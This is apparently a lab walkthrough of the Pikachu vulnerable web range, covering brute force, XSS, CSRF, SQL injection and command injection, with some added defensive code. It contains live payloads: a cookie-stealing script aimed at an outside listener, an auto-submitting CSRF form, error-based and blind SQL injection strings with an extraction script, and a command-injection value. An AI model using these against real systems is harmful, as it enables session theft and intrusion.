pikachu range clearance WP

Posted by Delaran on Thu, 11 Jun 2020 09:42:01 +0200

Pikachu is a web application built with vulnerabilities, covering the common web security flaws. If you are learning web penetration testing and worried about not having a suitable range to practice on, Pikachu may be right for you.

These are notes taken by Han Lu after studying the i-chunqiu course "Web security from entry to give up". The video course is long, 458 minutes in total, so this records the whole learning experience and the range clearance in written form for future reference.
This article does not cover setting up the range environment; the existing docker image can be used directly. Because of environment issues some functions do not work normally, which can be fixed by entering the shell of the docker container and changing the configuration file.

brute force

burp blasting reference link: https://t0data.gitbooks.io/burpsuite/content/chapter8.html

Brute force solution based on form

Open Burp to capture the request, run Cluster bomb with dictionaries on the username and password fields, and get admin/123456. Nothing more to say.

Verification code bypass (on server)

Use the Repeater module to test whether the verification code expires. If it does not expire, the username and password can be submitted repeatedly with the same code and brute forced as above.
Think about how burp could retrieve a fresh verification code from the server and fill it into the payload.

Verification code bypass (on client)

Client-side verification means the client proves itself, that is, the user has the final say. Open F12 developer mode to view the page source and find that both the generation and the verification of the verification code are implemented in the front end:

<script language="javascript" type="text/javascript">
    var code; //Define verification code globally
    function createCode() {
        code = "";
        var codeLength = 5;//Length of verification code
        var checkCode = document.getElementById("checkCode");
        var selectChar = new Array(0, 1, 2, 3, 4, 5, 6, 7, 8, 9,'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z');//All the candidate characters that make up the verification code; Chinese characters would work too

        for (var i = 0; i < codeLength; i++) {
            var charIndex = Math.floor(Math.random() * 36);
            code += selectChar[charIndex];
        }
        if (checkCode) {
            checkCode.className = "code";
            checkCode.value = code; //The code is written into the page, so the browser knows it
        }
    }

    function validate() {
        var inputCode = document.querySelector('#bf_client .vcode').value;
        if (inputCode.length <= 0) {
            alert("Please enter the verification code!");
            return false;
        } else if (inputCode != code) {
            alert("Verification code input error!");
            createCode();//Refresh verification code
            return false;
        } else {
            return true; //The only check is this client-side comparison
        }
    }
</script>


As long as the verification code is filled in correctly once (note that it is case sensitive here), let burp capture the request; since the server never checks the code, the request can be replayed and brute forced.
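As an added example (not code from the range), here is the server-side counterpart that addresses both flaws above: a verification code that is generated and checked on the server, bound to the session, expires, and can be used only once. The class, function names and the TTL are my own choices.

```python
import secrets
import string
import time

# Added example, not Pikachu's code: a server-side verification-code store.
# It fixes the two problems this section shows: generation and validation living in
# the browser, and a code that never expires so one captured request can be replayed.

CODE_CHARS = string.digits + string.ascii_uppercase   # same alphabet as the range's JS
CODE_LENGTH = 5
CODE_TTL_SECONDS = 60


class ServerCaptcha:
    """Codes are generated server-side, stored per session, expire after
    CODE_TTL_SECONDS and are consumed by the first verification attempt."""

    def __init__(self, now=time.time):
        self._now = now        # injectable clock so expiry can be tested offline
        self._store = {}       # session_id -> (code, issued_at)

    def issue(self, session_id):
        """Generate a fresh code for this session (the one rendered into the captcha image)."""
        # secrets, not Math.random(): the browser must not be able to predict the code
        code = "".join(secrets.choice(CODE_CHARS) for _ in range(CODE_LENGTH))
        self._store[session_id] = (code, self._now())
        return code

    def verify(self, session_id, submitted):
        """True only for the current, unexpired code of this session; the code is
        removed on every attempt, so replaying a captured request fails."""
        entry = self._store.pop(session_id, None)
        if entry is None:
            return False
        code, issued_at = entry
        if self._now() - issued_at > CODE_TTL_SECONDS:
            return False
        # constant-time comparison; case sensitive, like the range's own check
        return secrets.compare_digest(code.encode(), submitted.strip().encode())


def login_with_captcha(captcha, session_id, username, password, submitted_code, check_password):
    """Order matters: the captcha is consumed before the password is looked at, so every
    guess costs the attacker a fresh code and a brute-force tool cannot simply replay."""
    if not captcha.verify(session_id, submitted_code):
        return "captcha rejected"
    if not check_password(username, password):
        return "bad credentials"
    return "ok"
```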

token anti-brute-force?

Checking the source code, the submitted form has a hidden token field. A new token value is generated every time the form is loaded, and a submitted form is only valid if it carries the current token. The Recursive grep payload type in burp's Intruder module is exactly the right mode for this. It is used where valid data has to be extracted from the server: it takes data from the server's response as the payload and substitutes it at the payload position of the next request. Because its data comes from the previous response message, the grep rule is configured under Options and the extracted data is then used for the attack.
The steps for extracting the token value for brute forcing are as follows:
  1. Submit the form on the token anti-brute-force page and capture the request with burp.
  2. Ctrl+I sends the request to the Intruder module.
  3. Under Positions, mark the username, password and token values as payload positions.
  4. Under Payloads, set payload 1 to the username dictionary, payload 2 to the password dictionary, and payload 3 to the Recursive grep type.
  5. In the payload options of payload 3, fill the token value from the first response into "initial payload for first request".
  6. Under Options, Grep - Extract, locate the token value in the form returned by the first request.
  7. Recursive grep does not support multithreading, so set the number of threads in the request engine to 1.
  8. Click Start attack.
The simplest approach would be to let payload 1 and payload 2 run through every combination while payload 3 is used once, but I could not find an option to use payload 3 only once, so I used Cluster bomb mode directly. The attack therefore iterates over all three payloads, which is inefficient, but in the end the credentials can still be brute forced.

Cross-Site Scripting

Reflective xss(get)

The input box prompts you to input your favorite basketball star. Click submit to directly output your input to the Web front end. During the test, we found that the input box actually has a limit on our input length, which limits the maximum length to 20.

<input class="xssr_in" maxlength="20" name="message" type="text">

For example, the payload <script>alert(1)</script> exceeds the limit. The bypass is to type the payload directly into the GET request, such as http://xxx/vul/xss/xss_reflected_get.php?message=%3Cscript%3Ealert(1)%3C%2Fscript%3E&submit=submit, or to modify the maxlength attribute of the front-end input so the payload can be written directly into the input box.
Considering a real XSS attack scenario, we would construct a web link carrying the payload to lure users into clicking. The attack verification link is: http://xxx/vul/xss/xss_reflected_get.php?message=%3Cscript%3Ealert(1)%3C%2Fscript%3E&submit=submit

Reflective xss(post)

You need to log in here; the account admin/123456 brute forced earlier is enough. Then you enter your favorite basketball star in the input box as before. The difference is that the parameter is submitted by POST, so we need to construct an attack scenario.
Suppose the server that normally provides the web service is NS (normal server) and the malicious server built by the attacker, which hosts the malicious form page, is AS (attack server). If A wants B to trigger the POST xss on NS, A needs to make B submit the payload to NS without knowing it. Taking the theft of B's cookie after B logs in to NS as an example, the attack steps are: A constructs a form page that automatically submits the payload to NS and places it on AS, waiting for B to visit; B's browser logs in to NS and then merely visits the malicious auto-submitting form page on AS; B triggers the xss unknowingly and the cookie is stolen.

[Diagram: POST reflective xss exploitation scenario. A constructs the malicious form page that POSTs to NS and hosts it on AS; B logs in to NS; B unintentionally visits the malicious page on AS; AS returns the page containing JS that automatically POSTs data to NS; B's browser posts the data without the user's knowledge and triggers the xss.]

Storage xss

Stored XSS usually appears in message boards, blogs, comments and similar places, and is more harmful than reflected XSS: the malicious JS is saved on the server side, and it is triggered for every user who visits the page. The well-known Samy worm was a stored XSS. Using this scenario, let's simulate cookie stealing:

We use nclisten (http://www.nclisten.cn/) to simulate the attacker's server: it hands out a listening port that stands in for the attacker's malicious server. Here I got port 52119, meaning traffic sent to http://www.nclisten.cn:52119 is controlled by the attacker.

This exercise is a message board without filtering. Submitting a <script> tag triggers malicious JS that steals the cookies and sends them to the malicious server, for example:

document.write("<img src=http://www.nclisten.cn:52119/"+document.cookie+">");

This code sends the cookie of the page as part of a URL to our nc listening port. The attacker sees the complete request on the listening port and reads the user's cookie from the URL path. Refreshing the page, we receive:

GET /PHPSESSID=t30hinto5jli4asdjdi59n6k0a HTTP/1.1
Host: www.nclisten.cn:52119
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xxx.com/vul/xss/xss_stored.php
Connection: close
content:('x.x.x.x', 4892)

Cookie stealing works the same way in the other cases. For the later xss cases I will not record exploitation, only triggering and bypassing.

Dom xss

Generally, DOM xss is caused by front-end JS handling controllable parameters improperly. For example, the click me! button in this exercise has an onclick event that triggers the JS function domxss(). Tracing further, the code of domxss() is as follows:

	function domxss(){
    var str = document.getElementById("text").value;
    document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?</a>";
    //Try: '><img src="#" onmouseover="alert('xss')">
    //Try: ' onclick="alert('xss')">   Just close the tag
	}

The code takes the value from the text box and inserts it into the <a href=...> tag. We can first close the a tag and then construct a new malicious tag to insert (the code also gives a hint). A payload can be built as follows:

'><img src=x onerror=alert(1)><a href='#

After the payload is processed, document.getElementById("dom").innerHTML writes

<a href=''><img src=x onerror=alert(1)><a href='#'>what do you see?</a>

It closes both the preceding tag and the following tag, so it is not easy to notice that malicious code has been inserted. Of course, closing only the preceding tag is also enough: the following tag still executes because of HTML fault tolerance.

Is DOM xss harmful? I think so. First, such attacks are not blocked by a WAF, and the payload length is not limited; for example, when the controllable parameter is passed in the URL, it is much more harmful than reflected xss. An article on the Xianzhi community (先知社区) introduces several ways of exploiting DOM xss.

Dom xss-x

As in the previous exercise, let's first look at the code logic: it takes the value of the parameter text from the URL and then combines it into a new link written back to the front end.

function domxss(){
    var str = window.location.search; //Take the parameters after the url
    var txss = decodeURIComponent(str.split("text=")[1]); //url decoding
    var xss = txss.replace(/\+/g,' ');
//  alert(xss);
    document.getElementById("dom").innerHTML = "<a href='"+xss+"'>Let the past go with the wind,Go with the wind</a>";
   //Try: '><img src="#" onmouseover="alert('xss')">
   //Try: ' onclick="alert('xss')">   Just close the tag
}

The "Please say your sad past" button takes text and forms the new link. The parameter of the new link is controllable when its value is taken, so xss can be created. The payload is the same as in the previous exercise; only the way the parameter is passed differs.

XSS blind play

This means the attacker submits an xss payload without seeing any echo. A possible scenario is a message board where the person leaving the message cannot see the content, but the administrator sees and triggers the malicious script from the back office; this is often used to steal cookies.

XSS filtering

The <script> tag is filtered here; trigger through the <img> tag or other tags instead.

<img src=x onerror=alert(1)>

Common bypass methods:

  1. Case

htmlspecialchars of XSS

php's htmlspecialchars() function is to convert predefined characters into HTML entities.

Predefined characters are:

  • & (ampersand) becomes &amp;
  • " (double quote) becomes &quot;
  • ' (single quote) becomes &#039; (only with ENT_QUOTES)
  • < (less than) becomes &lt;
  • > (greater than) becomes &gt;

By default htmlspecialchars does not escape the single quote ('). The test idea is to input all these symbols once and see which of them are escaped. For example, inputting 111<>"'& we can see in the returned source that the characters have been converted into the predefined entities, except for the single quote.

<a href='111&lt;&gt;&quot;'&amp;'>

Construct a closure for the single quote and add a new attribute to the a tag to bypass it, for example the payload

#' onclick='alert(1)'

After filling it into the original page, the complete code is as follows. Clicking this link triggers the xss.

<a href='#' onclick='alert(1)''>#' onclick='alert(1)'</a>

XSS's href

Trigger directly through a pseudo protocol in the href: clicking a hyperlink whose href uses a pseudo protocol triggers the xss. For example:


To prevent xss caused by a pseudo protocol in the href, restrict the value to begin with http or https.
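As an added example (not the range's PHP), the following mimics the two htmlspecialchars() behaviours that this section and the previous one rely on, rebuilds the page's <a href='...'> output for the payloads shown above, and adds the http/https restriction for the href. Function names are my own; htmlspecialchars_default reproduces the pre-PHP-8.1 default flags (ENT_COMPAT), under which the single quote is left alone.

```python
from urllib.parse import urlsplit

# Added example, not the range's code. Reproduces PHP htmlspecialchars() with its
# pre-8.1 default flags (ENT_COMPAT: single quote untouched) and with ENT_QUOTES,
# then shows what the page's <a href='...'> template does with the payloads above.


def htmlspecialchars_default(s):
    """& < > and the double quote become entities; the single quote passes through."""
    return (s.replace("&", "&amp;").replace("<", "&lt;")
             .replace(">", "&gt;").replace('"', "&quot;"))


def htmlspecialchars_ent_quotes(s):
    """Same, plus the single quote as &#039; (what ENT_QUOTES adds)."""
    return htmlspecialchars_default(s).replace("'", "&#039;")


def render_link(value, escape=htmlspecialchars_default):
    """The range's pattern: user input escaped once, placed inside a single-quoted
    href and again as the link text. Pass escape=lambda s: s for the DOM case,
    where innerHTML is written with no escaping at all."""
    return "<a href='" + escape(value) + "'>" + escape(value) + "</a>"


ALLOWED_SCHEMES = ("http", "https")


def safe_href(value):
    """Returns the escaped href only for absolute http(s) URLs. javascript: and
    other pseudo protocols, and anything without a scheme, are rejected (None).
    urlsplit lower-cases the scheme, so JaVaScRiPt: is caught as well."""
    value = value.strip()
    parts = urlsplit(value)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return htmlspecialchars_ent_quotes(value)
```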

JS output of XSS

This applies when the controllable variable is output inside a front-end <script>. The test idea is to input a random string first and submit it, then view the source and use Ctrl+F to find the random string and locate it in the code. For example, I input asdf and find the output location of asdf:

    if($ms.length != 0){
        if($ms == 'tmac'){
            $('#fromjs').text("tmac is really powerful, look at that little look..")
        }else {
        // alert($ms);
            $('#fromjs').text('Never give up what you love..')
        }
    }


Construct a payload, such as:


If you fill in the original output position of payload, it will become


It is equivalent to inserting a fragment of pop-up code into the original code, and the xss is exploited successfully.
XSS cases are generally of the same kind. The defense can be summed up as input filtering and output escaping; the rest is learned in practice.


The explanation of CSRF in Pikachu range is as follows:

Cross Site Request Forgery is referred to as "CSRF". In a CSRF attack scenario, the attacker forges a request (usually a link) and then tricks the target user into clicking it. Once the user clicks the request, the whole attack is complete, so a CSRF attack is also called a "one click" attack. Many people don't understand the concept of CSRF, sometimes even confusing it with XSS, or even with ultra vires problems, which comes from not understanding the principle clearly.


According to the prompt in the upper right corner, you can log in as vince/allen/kobe/grady/kevin/lucy/lili and other users. After logging in there is a personal information modification page with a link to modify the information. Click submit and capture the request:

GET http://www.xxx.com/vul/csrf/csrfget/csrf_get_edit.php?sex=gir&phonenum=233&add=canada&email=lili%40picachu.com&submit=submit HTTP/1.1
Host: www.fxx.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.fxxx.com/vul/csrf/csrfget/csrf_get_edit.php
Connection: close
Cookie: PHPSESSID=38jfkmc1o29dm6gkkt8g33sim2
Upgrade-Insecure-Requests: 1

The parameters are GET parameters and there is no csrf_token. If attacker A wants to modify the information of victim B, A only needs to build such a link and send it to B. It is equivalent to A borrowing B's permission to modify B's personal information.

For example, if A wants to set the email address in lili's personal information to his own attacker@attacker.com, A can construct the link:


A can send this link to lili by email or other means to induce lili to click it. It can also be combined with xss so that lili's browser sends the request automatically: for example, leave a message like the following in the stored xss area and wait for lili to view the message page.

'><img src='http://www.xxx.com/vul/csrf/csrfget/csrf_get_edit.php?sex=gir&phonenum=233&add=canada&email=attacker%40attacker.com&submit=submit'>

Log in to the lili account, view the xss message area, and then go back to the personal information page: the email has been modified.


The exploitation method is the reflected XSS (post) scenario written earlier: the attacker builds a malicious page that automatically submits the form, hosts it on a server and lets the victim trigger it. Unlike GET-type csrf, the attacker has to construct a malicious form matching the form on the vulnerable page and submit it automatically. For this exercise the attacker could construct the following page:

<title>Form auto submit</title>
<!-- Click submit automatically after the page loads -->
<script type="text/javascript">
	window.onload = function(){
		autoSubmit();
		window.location.href="http://www.fucguigui.com"; //After submitting, jump to this page as a disguise
	}
</script>
<script type="text/javascript">
	function autoSubmit(){
		document.getElementById("submit").click(); //Click the hidden submit button
	}
</script>
<body >
<!-- Hidden form -->
<form id='myForm' action="http://www.xxx.com/vul/csrf/csrfpost/csrf_post_edit.php" method="post">
	<input type='hidden' name='sex' value='boy'>
	<input type='hidden' name='phonenum' value='evil'>
	<input type='hidden' name='add' value='fake_addr'>
	<input type='hidden' name='email' value='evil_form@admin.com'>
	<input id='submit' type="submit" name='submit' value="submit" style="display:none;">
</form>
</body>

When lili, the victim, is logged in to the original vulnerable page and visits the page constructed by the attacker, the information modification form is submitted with lili's identity without lili knowing it.

CSRF prevention

Add token verification

  1. Add a token to key operations. The token must be random and different every time.

    For attacks on the CSRF token, refer to: Magic can defeat Magic: thinking about the front-end skills of obtaining CSRF token

About secure session management (to avoid session exploitation)

  1. The client does not store sensitive information (such as identity authentication information)
  2. Destroy the session when the browser is closed or the user logs out
  3. Set a session expiration mechanism, such as automatic login timeout after 15 minutes without activity

Access control security management

  1. Modification of sensitive information requires secondary authentication (such as verifying the old password when changing the account)
  2. Use POST instead of GET for information modification
  3. Restrict the originating page through the Referer in the HTTP header

Add verification code

  1. Verification codes are mainly used to prevent brute force, but it is also better to add a verification code to some key operations, as long as usability is not affected.
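As an added example (not the range's code), the three server-side measures listed above, a random one-time token, POST only, and a Referer check, applied to the personal-information edit request captured earlier. The Session class and handler names are my own; www.xxx.com and the csrf_post_edit.php path are taken from the requests shown on this page.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Added example, not from the range: the server side of "add token verification",
# "post instead of get" and "restrict the original page through the referer",
# applied to the personal-information edit request shown earlier on this page.

SITE_ORIGIN = "http://www.xxx.com"   # the range's host as it appears on this page


class Session:
    """Minimal server-side session: the logged-in user and the currently valid token."""
    def __init__(self, user):
        self.user = user
        self.csrf_token = None


def issue_csrf_token(session):
    """Called when the edit form is rendered: a fresh random token per form, kept
    server-side and echoed into a hidden field, so an attacker's page cannot know it."""
    session.csrf_token = secrets.token_urlsafe(32)
    return session.csrf_token


def referer_ok(headers):
    """The Referer must point at our own origin; a missing Referer is rejected too."""
    referer = headers.get("Referer")
    if not referer:
        return False
    parts = urlsplit(referer)
    return parts.scheme + "://" + parts.netloc == SITE_ORIGIN


def handle_edit(session, method, form, headers):
    """Returns (accepted, reason). The token is single-use: it is cleared on every
    attempt, so a captured request cannot be replayed either."""
    if method != "POST":
        return False, "method"
    if not referer_ok(headers):
        return False, "referer"
    expected, session.csrf_token = session.csrf_token, None
    submitted = form.get("csrf_token", "")
    if expected is None or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False, "token"
    # only now would the profile of session.user be updated with form['sex'], ['phonenum'], ...
    return True, "ok"
```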

SQL injection

There is no need to mention sqlmap or scanners for finding injection vulnerabilities; this only records the ideas and simple methods of manual testing. Manual injection depends on understanding the characteristics and statements of the various databases, which takes a lot of effort to learn.

By the way, for MySQL with union echo, the sqligod payload, a long concat() of hex-encoded HTML, can be injected to get a graphical injection interface.


Digital input

The input here is a number chosen from a select box and submitted by POST to the back-end database query; the output is username and email. Assume the back end executes SQL like:

select username field, email field from user table where userid=$_POST(userid);

The most common and simplest injection is to close the last field of the SQL statement and insert new content. Submit a number such as 1, capture the request in burp and send it to Repeater. Change the POST parameters to id=1'&submit=%E6%9F%A5%E8%AF%A2 to try closing the statement with a single quote. As expected, an error is returned:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 

The error message confirms that the injection vulnerability exists and that the back-end database is MySQL. With more knowledge of MySQL statements you can build your own payloads, and with error echo you can adjust the statements step by step from the errors. To confirm the database version by manual injection, first determine the number of columns. order by 3 reports an error, meaning the query returns fewer than 3 columns:

id=1 order by 3&submit=%E6%9F%A5%E8%AF%A2

order by 2 executes normally, so the query returns 2 columns. Knowing the number of columns is a key step for constructing the injection statement manually. Next, construct a payload to determine the echo positions of the output:

id=1 union select 1,2&submit=%E6%9F%A5%E8%AF%A2

From the echo hello 1, your email is:2 we know the echo positions of the query, and we can roughly judge that both query results are of character type. To continue manual injection, for example: from the earlier error echo we determined that the back end is MySQL, but what is its version? A payload can be constructed as follows:

id=1 union select @@version,2&submit=%E6%9F%A5%E8%AF%A2

The result is

hello,5.7.27 your email is: 2

So the database version is MySQL 5.7.27. The principle of SQLi is basically the same throughout.
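As an added example (not the range's PHP), the spliced query this section assumes next to a parameterised version, run against an in-memory SQLite table that stands in for the range's MySQL user table with constructed rows. Function names are my own; union and order by behave the same in both databases for these inputs.

```python
import sqlite3

# Added example, not the range's PHP. The spliced query this section assumes, next to a
# parameterised version, run against an in-memory SQLite table that stands in for the
# range's MySQL user table (constructed rows).


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("create table users (id integer primary key, username text, email text)")
    con.executemany("insert into users values (?, ?, ?)", [
        (1, "vince", "vince@pikachu.com"),
        (2, "allen", "allen@pikachu.com"),
        (3, "kobe", "kobe@pikachu.com"),
    ])
    return con


def query_spliced(con, userid):
    """What 'where userid=$_POST(userid)' amounts to: the raw POST value is pasted into
    the statement, so 'id=1 union select 1,2' is executed as SQL."""
    sql = "select username, email from users where id=" + userid
    return con.execute(sql).fetchall()


def spliced_errors(con, userid):
    """True when the database rejects the spliced statement: the error echo that this
    section uses to confirm the injection point (id=1') and the column count (order by 3)."""
    try:
        query_spliced(con, userid)
        return False
    except sqlite3.OperationalError:
        return True


def query_parameterised(con, userid):
    """The fix: validate the shape first, then bind the value. The text can never become
    part of the SQL, so union, order by and quotes have no effect. None means reject (400)."""
    if not userid.isdigit():
        return None
    return con.execute("select username, email from users where id=?", (int(userid),)).fetchall()
```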

Character injection (GET)

Here there is an input box for character-type input, and the parameter name is passed by GET. Try typing kobe first; the query result is your uid:3 your email is: kobe@pikachu.com. The idea is the same: append a ' at the end to trigger an SQL error. Error echo is in fact the simplest case of SQL injection. The numeric payloads above cannot be used directly here. Looking at the original SQL statement, a typical character-type query may be:

select uid field, email field from user table where username = '$_GET(username)'

Because when writing SQL, character values may be enclosed in single or double quotation marks. To insert a statement that closes the string and executes normally, the quotation mark of the preceding string has to be closed. At the same time, we already know from the earlier injection that the database is MySQL, so a single-line comment can be used to invalidate the quotation mark at the end of the statement.

For example, if you want to execute

select 1,'Inject by C'

Payloads are going to be written

' union select 1,'Inject by C'#

Splicing into the original statement is a complete injection statement.

select uid field, email field from user table where username = '' union select 1,'Inject by C'#'

The GET parameter should be url encoded, so the full payload is

?name='%20union%20select%201%2c'Inject by C'%23

Search injection

A general search function uses SQL fuzzy matching, for example searching all users whose username contains k:

select * from USER where username like '%k%'

The idea of constructing the payload is the same as for the character type; construct one that closes the string, for example

k%' union select 1,2,'sqlitest'#

URL-encode it, put it into the GET parameter and send it to the server for execution.


XX injection

In fact, the three cases above show that SQL injection is about guessing how the statement is spliced and confirming whether the constructed payload is executed. Error echo after appending ' to the query parameter is one way to confirm SQL injection, and there are other injections without echo.

Generally, whether a statement is executed can be judged by splicing in logical expressions such as ' and 1=2 or ' or 1=1 and comparing the results. Test the closure in the same way as before, testing until


it is found that the statement executes normally, indicating that the spliced statement here is closed with parentheses. Add the statement you want to execute before the comment, and the injection succeeds:



All the previous injections are based on union or select queries, but in fact insert and update statements can also be injected, and not only with SQL injection but also stored xss (for example, if a user writes a malicious tag when registering here, the pop-up appears on login). For insert injection, if a subquery is spliced in, you have to log in to find the location just inserted, so an account must be registered for every test, which is troublesome. It is more convenient to output the data we want through error-based functions such as updatexml(), extractvalue() and floor(). A typical insert statement looks like:

insert into USERS(username, passwd,email) values('','','')

To insert a statement, use or to construct the closure, for example fill the username field with

' or evil_sql or '

which, spliced into the original statement, executes the malicious statement:

insert into USERS(username, passwd,email) values('' or evil_sql or','','')

Based on error echo, the username payload is:

kobe2' or updatexml(1,concat(0x7e,version()),0) or '

Then enter any password field and submit it to find the error echo of our query version:

XPATH syntax error: '~5.7.27'

In the same way, the same payload can be used for update injection. Note that when filling in the update form, remember to fill in every column before clicking submit; otherwise it will not be executed. This is a problem of the range's back-end code.

Delete injection

It is not hard to find that clicking delete sends the id parameter by GET. The id parameter is numeric, so the error function can also be used to trigger echo. Construct the payload

 or extractvalue(1,concat(0x7e,database()))#

URL-encode it and append it after the URL parameter


After access, the database() function executes and its result is echoed in the error message; the injection succeeds.

XPATH syntax error: '~pikachu'

Error-based injection: floor() injection (refer to https://www.cnblogs.com/sfriend/p/11365999.html )

floor() error-based injection uses a conflict between floor(), count() and group by to raise an error; it is an error generated when these three are used together in a specific situation. Once you understand the principle you will find it a very clever method.

"http header" injection

After logging in as admin/123456, the page displays the User-Agent, HTTP Accept and port information and says this information has been recorded in the database. It is not hard to guess that a database insert statement is used here, with the inserted content taken from HTTP header values. Capture the request in burp and change the User-Agent: it is indeed taken from the HTTP header. Using the same payload idea, we can use error-based injection. Capture a page request and modify the UA part of the HTTP header to

User-Agent: evil' or updatexml(1,concat(0x7e,version()),0) or '

Echo of the error-based injection:

XPATH syntax error: '~5.7.27'

Similarly, HTTP Accept and the others can be injected the same way. Besides, there are username and passwd fields in the cookie; it is not hard to find that they exist here too.

base on boolean

Blind injection is the case where the developer has blocked the database error echo, so we cannot determine the injection point and the injection result from the echo.

The injection point can be determined with logical operations such as and 1=1# and order by 1# and observing whether the page is normal. Exploitation of blind injection can be based on boolean judgment, time injection or dnslog.

Let's first look at boolean injection. Entering kobe' and 1=1# executes, kobe' and 1=2# does not, so our content must have been injected successfully. How to exploit it?

Boolean injection relies on value-taking and operation functions such as length(), substr() and ascii(). substr() cuts characters out of strings, and ascii() converts them into numbers that can take part in arithmetic comparisons. For example:

select ascii(substr('string',1,1))>114;

This statement returns 1: the ascii code of the character s cut from string is 115, and 115 is greater than 114. Of course, such a judgment is very slow. For example, when injecting the database name we don't know how long it is; the length can then be judged with the length function, such as

kobe' and length(database())>7#

displays username does not exist, but

kobe' and length(database())>6#

What is displayed is the information of the query result. So we determined that the database name has seven characters.

Then what is the first character of the database name? Similarly

kobe' and ascii(substr(database(),1,1))=112# #The database name is pikachu; the ascii value of p is 112, so the expression is true, and for any other value it is false

With this logic we can determine the ascii code of each character. The principle of boolean blind injection is roughly the same. Manual testing involves too much work, so boolean blind injection is best done with an automated script.

To brute force the database name here, a simple script is as follows:

# If only a brute-force script is used, a binary search would be more efficient

import requests

# placeholder: the URL of the range's boolean-blind page, which is not given on this page
base_url = "http://www.xxx.com/vul/sqli/<boolean-blind page>"

# data = {"name": "kobe' and ascii(substr(database(),1,1))=112#", "submit": "Submit"}
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)"
                         " Chrome/54.0.2840.99 Safari/537.36"}
cookies = {"PHPSESSID": "iiuifpfpk5b4u462apjm5nqb87"}

# r = requests.get(base_url,  params=data, headers=headers, cookies=cookies)

dbname = ""
for length in range(1, 8):          # the length test above showed 7 characters
    for i in range(0, 128):         # try every ascii value for this position
        data = {"name": "kobe' and ascii(substr(database()," + str(length) + ",1))=" + str(i) + "#", "submit": "Submit"}
        r = requests.get(base_url, params=data, headers=headers, cookies=cookies)
        if r.text.find('your uid') != -1:   # the row is only returned when the comparison is true
            dbname += chr(i)
            print(dbname)
            break

Of course, substr() above can be replaced by left(), right() and other functions that take characters.

Table names are normally read from information_schema, but sometimes that table cannot be read. On the same principle, the exists function can be used to brute-force table names (TABLE marks the position burp substitutes from the wordlist):

kobe' and exists(select * from TABLE)#

Combined with burp's grep match rule, the table names that produce the "your uid" page are the ones that exist.

Based on time

Boolean-based injection is judged from a 0/1 difference in the page. In time-based blind injection nothing at all is visible, and whether the statement executed cannot be told from the display, so time is used as the signal instead. The delay function in MySQL is sleep(). For example, the input box here echoes quickly when I type kobe, but if I type

kobe' and sleep(5)#

the server takes a long time to process the request, which shows there is SQL injection. For exploitation the payload is combined with an if() statement; to judge whether the first character returned by database() is p, construct the payloads

kobe' and if(substr(database(),1,1)='p', sleep(5), null)#

kobe' and if(substr(database(),1,1)='a', sleep(5), null)#

It is easy to see that only the first payload triggered sleep(), so the first letter of the database name is p, and the remaining characters are recovered the same way. In addition, benchmark(count, expr) achieves the same time-based effect: count is the number of times expr is evaluated, and the larger it is, the longer the query takes.

Wide byte injection

Wide byte injection is a feature of MySQL. When the connection uses GBK encoding, MySQL treats two bytes as one Chinese character (the first byte has to be greater than 128 to fall into the Chinese character range). The trick is that addslashes() escapes a quote by putting a backslash (0x5c) in front of it; if the attacker places a byte such as %df before the quote, MySQL reads %df%5c as one GBK character and the quote is left unescaped. Most applications today use Unicode/UTF-8, but GBK still turns up. phithon explains the details of wide byte injection here: https://www.leavesongs.com/PENETRATION/mutibyte-sql-inject.html

Once the principle is understood, construct the injection in the POST packet

name=kobe%df' or 1=1#&submit=%E6%9F%A5%E8%AF%A2
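To see why %df frees the quote, here is an added example (mine, not from the page) that imitates PHP's addslashes() on raw bytes and then decodes the statement the way a GBK-configured MySQL connection would; the table and column names are assumed:

```python
def addslashes(data: bytes) -> bytes:
    """Byte-wise imitation of PHP addslashes(): backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)          # the backslash that is supposed to protect the quote
        out.append(b)
    return bytes(out)


def vulnerable_query(name: bytes) -> str:
    """addslashes() runs on raw bytes, then the GBK connection decodes the statement:
    0xDF followed by the inserted 0x5C is one GBK character, so the quote is free."""
    escaped = addslashes(name)
    sql = b"select id,email from member where username='" + escaped + b"'"
    return sql.decode("gbk", errors="replace")


def hardened_query(name: bytes) -> str:
    """Decode first, as the real request encoding, and escape the text afterwards:
    the escape character can no longer be swallowed into a multibyte sequence.
    (Parameterised queries remain the proper fix; this only shows the ordering.)"""
    text = name.decode("utf-8", errors="replace")   # the stray 0xDF becomes U+FFFD
    text = text.replace("\\", "\\\\").replace("'", "\\'")
    return "select id,email from member where username='" + text + "'"


def quote_is_escaped(sql: str) -> bool:
    """True when every single quote inside the value is preceded by a backslash."""
    body = sql[sql.index("='") + 2:-1]      # the part between the outer quotes
    i = body.find("'")
    while i != -1:
        if i == 0 or body[i - 1] != "\\":
            return False
        i = body.find("'", i + 1)
    return True


# Constructed payload: the URL-decoded bytes of  name=kobe%df' or 1=1#
PAYLOAD = b"kobe\xdf' or 1=1#"
```

Printing vulnerable_query(PAYLOAD) shows the quote standing alone after a Chinese character, which is the statement MySQL actually runs; the same payload without the leading %df byte is escaped correctly, which is why the bug only appears with a multibyte connection charset.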


RCE

In general, remote command execution means that the attacker sends commands or code straight to the backend server and has them injected into the system remotely, thereby controlling the backend.


This is a ping function interface: enter an address and the ping result is returned. Because the backend splices the input directly into the command, the pseudo code is

ping $_POST[ip]

If the POST parameter is ;ls

the complete command after splicing is ping followed by ;ls, and the shell runs ls as a second command.

That is the command injection effect.


